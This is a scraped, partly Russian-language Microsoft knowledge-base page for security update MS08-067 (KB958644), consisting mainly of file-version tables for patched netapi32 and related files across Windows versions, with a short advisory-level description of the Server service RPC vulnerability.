X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable


Дополнительные файлы для всех поддерживаемых версий Windows Server 2008 для платформы IA-64

File name

Ia64_5318e8eb9e87d0695533f066c047f96b_31bf3856ad364e35_6.0.6001.18157_none_82a29afb7aa0d23c.manifest

File version

Not Applicable

File size

698

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_9c84e32c7f67dae6326ee85998cad9e6_31bf3856ad364e35_6.0.6001.18157_none_9713870461709fdd.manifest

File version

Not Applicable

File size

1,038

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_f1b22e2871aa832be2376a26d588f7f5_31bf3856ad364e35_6.0.6001.22288_none_d0e8a3e531733c64.manifest

File version

Not Applicable

File size

1,038

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_f420bbd70e5d59529cd3c0d55fc47000_31bf3856ad364e35_6.0.6001.22288_none_fa8a6023da16ba48.manifest

File version

Not Applicable

File size

698

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d06b35901b0216b.manifest

File version

Not Applicable

File size

12,048

Date (UTC)

16-Oct-2008

Time (UTC)

08:04

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d70e0aa1ae52e5f.manifest

File version

Not Applicable

File size

12,048

Date (UTC)

16-Oct-2008

Time (UTC)

06:02

Platform

Not Applicable

File name

Package_1_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,748

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,452

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,961

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,885

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,961

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

2,885

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,415

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,434

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,436

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,419

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,438

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,424

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,444

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,416

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_0~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,435

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv_bf~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,423

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Package_for_kb958644_winpesrv~31bf3856ad364e35~ia64~~6.0.1.0.mum

File version

Not Applicable

File size

1,443

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

Update-bf.mum

File version

Not Applicable

File size

2,381

Date (UTC)

16-Oct-2008

Time (UTC)

15:02

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.18157_none_8d050f6301b2186f.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:24

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.0.6001.22288_none_8d6f3cb41ae72563.manifest

File version

Not Applicable

File size

12,029

Date (UTC)

16-Oct-2008

Time (UTC)

05:09

Platform

Not Applicable

Сведения о дополнительных файлах для системы Windows 7 (предварительная бета-версия)

Дополнительные файлы для всех поддерживаемых 32-разрядных версий Windows 7 (предварительная бета-версия)

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,817

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,817

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,822

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,822

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,468

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,468

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,456

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,456

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,462

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,462

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.0.mum

File version

Not Applicable

File size

1,466

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~x86~~6.1.1.1.mum

File version

Not Applicable

File size

1,466

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_5d2c1db358bd7f56.manifest

File version

Not Applicable

File size

694

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_977a59a5a18b9d73.manifest

File version

Not Applicable

File size

694

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable

Дополнительные файлы для всех поддерживаемых 64-разрядных версий Windows 7 (предварительная бета-версия)

File name

Amd64_6c5ff7f4df12fe656967bcd9a0851cf9_31bf3856ad364e35_6.1.6801.4107_none_9d8d50283e89a478.manifest

File version

Not Applicable

File size

698

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_8bb4665ee38b9909b49c6690c13a54c9_31bf3856ad364e35_6.1.6801.4106_none_abaa496388f1d851.manifest

File version

Not Applicable

File size

1,037

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Amd64_8c88416a1b833ae7bf1ac5e3ba55e123_31bf3856ad364e35_6.1.6801.4107_none_b94ab937111af08c.manifest

File version

Not Applicable

File size

696

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_9622219576c10955b3e5860711ff058f_31bf3856ad364e35_6.1.6801.4106_none_f398f52959e90ea9.manifest

File version

Not Applicable

File size

696

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Amd64_9ac4fb3739ecadbb3fe4552a8ce044b5_31bf3856ad364e35_6.1.6801.4106_none_5b9a53630b032ec0.manifest

File version

Not Applicable

File size

698

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Amd64_f2e520fe3e78b2637293494b1895dead_31bf3856ad364e35_6.1.6801.4107_none_88b415476ce0db7b.manifest

File version

Not Applicable

File size

1,037

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Amd64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_2230761ac011a177.manifest

File version

Not Applicable

File size

2,403

Date (UTC)

18-Oct-2008

Time (UTC)

06:26

Platform

Not Applicable

File name

Amd64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_c50a98bb08a2c330.manifest

File version

Not Applicable

File size

2,189

Date (UTC)

21-Oct-2008

Time (UTC)

08:33

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,827

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,827

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,045

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

2,045

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

2,045

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_3_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

2,045

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,832

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_4_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,832

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,814

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_5_for_kb958644~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,814

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,476

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,476

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,465

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_client~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,465

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,951

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,951

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,474

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,474

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,476

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,476

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,465

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,465

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,470

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe_0~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,470

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.0.mum

File version

Not Applicable

File size

1,475

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_winpe~31bf3856ad364e35~amd64~~6.1.1.1.mum

File version

Not Applicable

File size

1,475

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable


Дополнительные файлы для всех поддерживаемых версий Windows 7 (предварительная бета-версия) для платформы IA-64

File name

Ia64_063c1cfe8cbabfce3ffb0dc28ef38fc5_31bf3856ad364e35_6.1.6801.4107_none_b39a525ed326a3c8.manifest

File version

Not Applicable

File size

696

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Ia64_dc308b4973bef77766097858c0f07d87_31bf3856ad364e35_6.1.6801.4106_none_5a453cd060e99fe3.manifest

File version

Not Applicable

File size

696

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Ia64_f556a82744118350805ca73aa737ccaa_31bf3856ad364e35_6.1.6801.4107_none_ff5785ba70f128b5.manifest

File version

Not Applicable

File size

1,035

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Ia64_f6840120760844e1cf48807bba0611b4_31bf3856ad364e35_6.1.6801.4106_none_0132ac58e91cf28f.manifest

File version

Not Applicable

File size

1,035

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Ia64_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c6137e8d07b2393d.manifest

File version

Not Applicable

File size

2,402

Date (UTC)

18-Oct-2008

Time (UTC)

05:34

Platform

Not Applicable

File name

Ia64_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68eda12d50435af6.manifest

File version

Not Applicable

File size

2,188

Date (UTC)

21-Oct-2008

Time (UTC)

06:53

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

2,040

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_1_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

2,040

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,827

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_2_for_kb958644~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,827

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,468

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc_0~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,468

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,469

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_sc~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,469

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,472

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server_0~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,472

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.0.mum

File version

Not Applicable

File size

1,460

Date (UTC)

18-Oct-2008

Time (UTC)

09:47

Platform

Not Applicable

File name

Package_for_kb958644_server~31bf3856ad364e35~ia64~~6.1.1.1.mum

File version

Not Applicable

File size

1,460

Date (UTC)

21-Oct-2008

Time (UTC)

21:07

Platform

Not Applicable

File name

X86_microsoft-windows-netapi32_31bf3856ad364e35_6.1.6801.4106_none_c611da9707b43041.manifest

File version

Not Applicable

File size

2,401

Date (UTC)

18-Oct-2008

Time (UTC)

06:13

Platform

Not Applicable

File name

X86_microsoft-windows-netutils_31bf3856ad364e35_6.1.6801.4107_none_68ebfd37504551fa.manifest

File version

Not Applicable

File size

2,187

Date (UTC)

21-Oct-2008

Time (UTC)

08:25

Platform

Not Applicable
Источник

Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you’re running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: Support is ending for some versions of Windows.

INTRODUCTION

This article discusses a beta release of a Microsoft product. The information in this article is provided as-is and is subject to change without notice.

No formal product support is available from Microsoft for this beta product. For information about how to obtain support for a beta release, see the documentation that is included with the beta product files, or check the Web location where you downloaded the release.
Microsoft has released security bulletin MS08-067. To view the complete security bulletin, visit one of the following Microsoft Web sites:

  • http://www.microsoft.com/protect/computer/updates/bulletins/200810.mspxSkip the details: Download the updates for your home computer or laptop from the Microsoft Update Web site now:

    http://update.microsoft.com/microsoftupdate/

  • http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If the crash in Svchost.exe occurs, the Server service will be affected. The Server service provides file, print, and named pipe sharing over the network.

The vulnerability is caused by the Server service, which does not correctly handle specially crafted RPC requests.

How to obtain help and support for this security update

File information

The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.

For all supported editions of Microsoft Windows 2000 Service Pack 4

File name

File version

File size

Date

Time

Platform

Netapi32.dll

5.0.2195.7203

310,032

18-Oct-2008

03:11

x86


Windows XP and Windows Server 2003 file information notes

  • The files that apply to a specific milestone (RTM, SPn) and service branch (QFE, GDR) are noted in the «SP requirement» and «Service branch» columns.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes.

  • In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KBnumber.cat) that is signed with a Microsoft digital signature.


For all supported x86-based versions of Windows XP

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.1.2600.3462

332,800

15-Oct-2008

16:57

x86

SP2

SP2GDR

Netapi32.dll

5.1.2600.3462

339,456

15-Oct-2008

16:53

x86

SP2

SP2QFE

Netapi32.dll

5.1.2600.5694

337,408

15-Oct-2008

16:34

x86

SP3

SP3GDR

Netapi32.dll

5.1.2600.5694

339,456

15-Oct-2008

16:25

x86

SP3

SP3QFE


For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

603,648

17-Oct-2008

11:44

x64

SP1

SP1GDR

Wnetapi32.dll

5.2.3790.3229

350,208

17-Oct-2008

11:44

x86

SP1

SP1GDRWOW

Netapi32.dll

5.2.3790.3229

606,720

17-Oct-2008

11:44

x64

SP1

SP1QFE

Wnetapi32.dll

5.2.3790.3229

352,768

17-Oct-2008

11:44

x86

SP1

SP1QFEWOW

Netapi32.dll

5.2.3790.4392

603,648

17-Oct-2008

11:53

x64

SP2

SP2GDR

Wnetapi32.dll

5.2.3790.4392

345,088

17-Oct-2008

11:53

x86

SP2

SP2GDRWOW

Netapi32.dll

5.2.3790.4392

606,720

17-Oct-2008

11:44

x64

SP2

SP2QFE

Wnetapi32.dll

5.2.3790.4392

347,648

17-Oct-2008

11:44

x86

SP2

SP2QFEWOW


For all supported x86-based versions of Windows Server 2003

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

350,208

16-Oct-2008

20:09

x86

SP1

SP1GDR

Netapi32.dll

5.2.3790.3229

352,768

16-Oct-2008

21:47

x86

SP1

SP1QFE

Netapi32.dll

5.2.3790.4392

345,088

16-Oct-2008

22:18

x86

SP2

SP2GDR

Netapi32.dll

5.2.3790.4392

347,648

16-Oct-2008

23:37

x86

SP2

SP2QFE


For all supported IA-64-based versions of Windows Server 2003

File name

File version

File size

Date

Time

Platform

SP requirement

Service branch

Netapi32.dll

5.2.3790.3229

905,216

17-Oct-2008

11:45

IA-64

SP1

SP1GDR

Wnetapi32.dll

5.2.3790.3229

350,208

17-Oct-2008

11:45

x86

SP1

SP1GDRWOW

Netapi32.dll

5.2.3790.3229

910,848

17-Oct-2008

11:45

IA-64

SP1

SP1QFE

Wnetapi32.dll

5.2.3790.3229

352,768

17-Oct-2008

11:45

x86

SP1

SP1QFEWOW

Netapi32.dll

5.2.3790.4392

905,216

17-Oct-2008

11:50

IA-64

SP2

SP2GDR

Wnetapi32.dll

5.2.3790.4392

345,088

17-Oct-2008

11:50

x86

SP2

SP2GDRWOW

Netapi32.dll

5.2.3790.4392

910,848

17-Oct-2008

11:45

IA-64

SP2

SP2QFE

Wnetapi32.dll

5.2.3790.4392

347,648

17-Oct-2008

11:45

x86

SP2

SP2QFEWOW


Windows Vista, Microsoft Hyper-V Server 2008, and Windows Server 2008 file information notes

  • The files that apply to a specific product, milestone (RTM, SPn), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:

    Version

    Product

    Milestone

    Service branch

    6.0.600
    0.
    16xxx

    Windows Vista

    RTM

    GDR

    6.0.600
    0.
    20xxx

    Windows Vista

    RTM

    LDR

    6.0.600
    1.
    18xxx

    Windows Vista SP1 and Windows Server 2008 SP1

    SP1

    GDR

    6.0.600
    1.
    22xxx

    Windows Vista SP1 and Windows Server 2008 SP1

    SP1

    LDR

  • Service Pack 1 is integrated into the original release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000. xxxxxx version number.

  • GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.

  • The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.


For all supported x86-based versions of Windows Server 2008 and of Windows Vista

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6000.16764

425,472

16-Oct-2008

04:40

x86

Netapi32.dll

6.0.6000.20937

425,984

16-Oct-2008

04:22

x86

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86


For all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6000.16764

607,232

16-Oct-2008

04:43

x64

Netapi32.dll

6.0.6000.20937

606,720

16-Oct-2008

04:28

x64

Netapi32.dll

6.0.6001.18157

648,704

16-Oct-2008

05:49

x64

Netapi32.dll

6.0.6001.22288

648,704

16-Oct-2008

05:02

x64

Netapi32.dll

6.0.6000.16764

425,472

16-Oct-2008

04:40

x86

Netapi32.dll

6.0.6000.20937

425,984

16-Oct-2008

04:22

x86

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86


For all supported IA-64-based versions of Windows Server 2008

File name

File version

File size

Date

Time

Platform

Netapi32.dll

6.0.6001.18157

1,080,832

16-Oct-2008

06:21

IA-64

Netapi32.dll

6.0.6001.22288

1,080,832

16-Oct-2008

04:59

IA-64

Netapi32.dll

6.0.6001.18157

466,944

16-Oct-2008

04:47

x86

Netapi32.dll

6.0.6001.22288

466,944

16-Oct-2008

04:38

x86

Windows 7 Pre-Beta file information notes

The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are listed separately. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature.

For all supported x86-based versions of Windows 7 Pre-Beta

File name

File version

File size

Date

Time

Platform

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86


For all supported x64-based versions of Windows 7 Pre-Beta

File name

File version

File size

Date

Time

Platform

Netutils.dll

6.1.6801.4107

29,184

20-Oct-2008

23:47

x64

Netutils.dll

6.1.6801.4107

22,528

20-Oct-2008

23:19

x86


For all supported ia64-based versions of Windows 7 Pre-Beta

File name

File version

File size

